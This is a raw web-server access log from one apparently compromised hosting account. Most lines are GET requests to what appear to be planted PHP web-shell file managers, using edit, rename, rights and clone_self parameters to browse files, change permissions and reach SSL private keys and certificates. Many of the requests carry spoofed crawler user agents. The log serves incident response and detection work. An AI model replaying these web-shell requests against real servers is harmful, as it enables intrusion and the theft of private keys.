74.7.227.14 - - [24/Dec/2025:07:10:11 -0600] "GET /vendor/laravel/framework/src/global.php?edit=457673.php.php.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/ HTTP/1.1" 200 19031 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:11 -0600] "GET /vendor/laravel/framework/src/global.php?edit=273686.php.php.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/ HTTP/1.1" 200 19031 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:12 -0600] "GET /vendor/laravel/framework/src/global.php?edit=119806.php.php.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/ HTTP/1.1" 200 19031 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:12 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=273686.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:13 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=124013.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
54.39.210.231 - - [24/Dec/2025:07:10:13 -0600] "GET /wp-comment.php?fm=true&edit=ducache.tar.gz&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18955 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:10:14 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=317671.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:14 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=918239.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:15 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=671156.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:15 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=534894.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:16 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=119806.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:16 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=216071.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:17 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=379933.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:17 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=284768.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:18 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=317671.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:18 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=989790.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:19 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=273686.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:19 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=457673.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
142.44.225.35 - - [24/Dec/2025:07:10:20 -0600] "GET /wp-comment.php?fm=true&edit=ducache.tar&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 31511 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:10:20 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=689060.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:20 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=168561.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:21 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=702123.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:21 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=866594.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:22 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=417539.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:22 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=247329.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:23 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=379933.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:24 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=478164.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.161.65.144 - - [24/Dec/2025:07:10:24 -0600] "GET /wp-comment.php?fm=true&edit=dovecot.list.index.tar&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18971 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:10:24 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=284768.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:25 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=989790.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:25 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=752531.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:26 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=478164.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:26 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=866594.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:27 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=328950.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
65.21.136.254 - - [24/Dec/2025:07:10:27 -0600] "GET /helper.php.tar HTTP/1.1" 200 96768 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0"
74.7.227.14 - - [24/Dec/2025:07:10:27 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=457673.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
54.39.89.158 - - [24/Dec/2025:07:10:27 -0600] "GET /wp-comment.php?fm=true&edit=dovecot.list.index.log.tar&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18979 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:10:28 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=328950.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:28 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=119806.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:29 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=689060.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:29 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=702123.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:30 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=168561.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:30 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=735655.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:31 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=745356.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:31 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=918239.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
15.235.27.242 - - [24/Dec/2025:07:10:31 -0600] "GET /wp-comment.php?fm=true&edit=dovecot.list.index.log.list.index.log.tar.gz&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 19015 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:10:32 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=417539.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:32 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=745356.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:33 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=671156.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:34 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=810903.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:34 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=216071.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:35 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=124013.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:35 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=844603.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
15.235.96.220 - - [24/Dec/2025:07:10:35 -0600] "GET /wp-comment.php?fm=true&edit=dovecot.list.index.list.index.tar.gz&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18999 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:10:36 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=735655.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:36 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=844603.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:37 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=534894.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:37 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=810903.php.php.tar.gz HTTP/1.1" 200 18910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:38 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=247329.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:38 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=752531.php.php.tar.gz HTTP/1.1" 200 18926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:39 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/ssl/keys/&rights=daa67_d503d_fa5a544a2c2a0baf5ef80ea0c8b67d35.key HTTP/1.1" 200 18905 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:39 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/ssl/keys/&rename=daa67_d503d_fa5a544a2c2a0baf5ef80ea0c8b67d35.key HTTP/1.1" 200 18889 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
54.39.0.255 - - [24/Dec/2025:07:10:40 -0600] "GET /wp-comment.php?fm=true&edit=dovecot.index.log.tar&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18969 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
15.235.96.9 - - [24/Dec/2025:07:10:45 -0600] "GET /wp-comment.php?fm=true&edit=dovecot.index.log.index.log.tar.gz&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18995 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:10:40 -0600] "GET /vendor/laravel/framework/src/global.php?clone_self=1&fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/ HTTP/1.1" 200 665323 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:46 -0600] "GET /vendor/laravel/framework/src/global.php?edit=_wildcard__sardargurjari_com_daa67_d503d_1770053979_f6ac040648fc3f528f905d096a556c71.crt.crt.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/ HTTP/1.1" 200 19187 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
52.167.144.188 - - [24/Dec/2025:07:10:46 -0600] "GET /visitorm/mvichar.aspx?Lekhak=29223 HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.14 - - [24/Dec/2025:07:10:46 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/vendor/laravel/framework/src/&rights=lib.php.php.tar.gz HTTP/1.1" 200 18941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:47 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/vendor/laravel/framework/src/&rename=bin.php.php.tar.gz HTTP/1.1" 200 18925 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:47 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/vendor/laravel/framework/src/&rename=lib.php.php.tar.gz HTTP/1.1" 200 18925 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:48 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/vendor/laravel/framework/src/&rights=bin.php.php.tar.gz HTTP/1.1" 200 18941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:48 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=sardargurjari_com_c6ac9_d7a65_1759509533_c58b24e648ab82168422d76177175cd5.crt.crt.tar.gz HTTP/1.1" 200 19060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:49 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=sardargurjari_com_b6e26_029c3_1783272806_0d8619ef1e1a914bbfa4a2571179acc0.crt.crt.tar.gz HTTP/1.1" 200 19060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
54.39.203.230 - - [24/Dec/2025:07:10:49 -0600] "GET /wp-comment.php?fm=true&edit=dovecot-quota.tar.gz&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18967 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:10:49 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=sardargurjari_com_b6e26_029c3_1783272806_0d8619ef1e1a914bbfa4a2571179acc0.crt.crt.tar.gz HTTP/1.1" 200 19044 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:50 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=sardargurjari_com_c6ac9_d7a65_1759509533_c58b24e648ab82168422d76177175cd5.crt.crt.tar.gz HTTP/1.1" 200 19044 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:50 -0600] "GET /vendor/laravel/framework/src/global.php?edit=shared.php.php.tar.gz&fm=true&path=/home/wsardargurjari/public_html/vendor/laravel/framework/src/ HTTP/1.1" 200 19052 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:51 -0600] "GET /vendor/laravel/framework/src/global.php?fm=true&path=/home/wsardargurjari/public_html/vendor/laravel/framework/src/&rename=shared.php.php.tar.gz HTTP/1.1" 200 18931 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:10:51 -0600] "GET /storage/app/public/wp-blog-header2122.php HTTP/1.1" 200 81785 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
54.39.0.151 - - [24/Dec/2025:07:10:54 -0600] "GET /wp-comment.php?fm=true&edit=dovecot-quota.tar&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 21009 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
51.222.168.229 - - [24/Dec/2025:07:11:00 -0600] "GET /wp-comment.php?fm=true&edit=datastore.zip&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18956 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
159.195.58.198 - - [24/Dec/2025:07:11:01 -0600] "GET /420739.php.php.tar.gz HTTP/1.1" 200 29382 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:146.0) Gecko/20100101 Firefox/146.0"
74.7.227.14 - - [24/Dec/2025:07:10:52 -0600] "GET /wp-content/uploads/2023/cache/353469.php HTTP/1.1" 200 531332 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:02 -0600] "GET /vendor/laravel/framework/src/global.php?edit=232384.php&fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/ HTTP/1.1" 200 125067 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:03 -0600] "GET /wp-admin/includes/class/637806.php HTTP/1.1" 200 80999 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
142.44.225.135 - - [24/Dec/2025:07:11:04 -0600] "GET /wp-comment.php?fm=true&edit=css.tar.gz&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18947 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
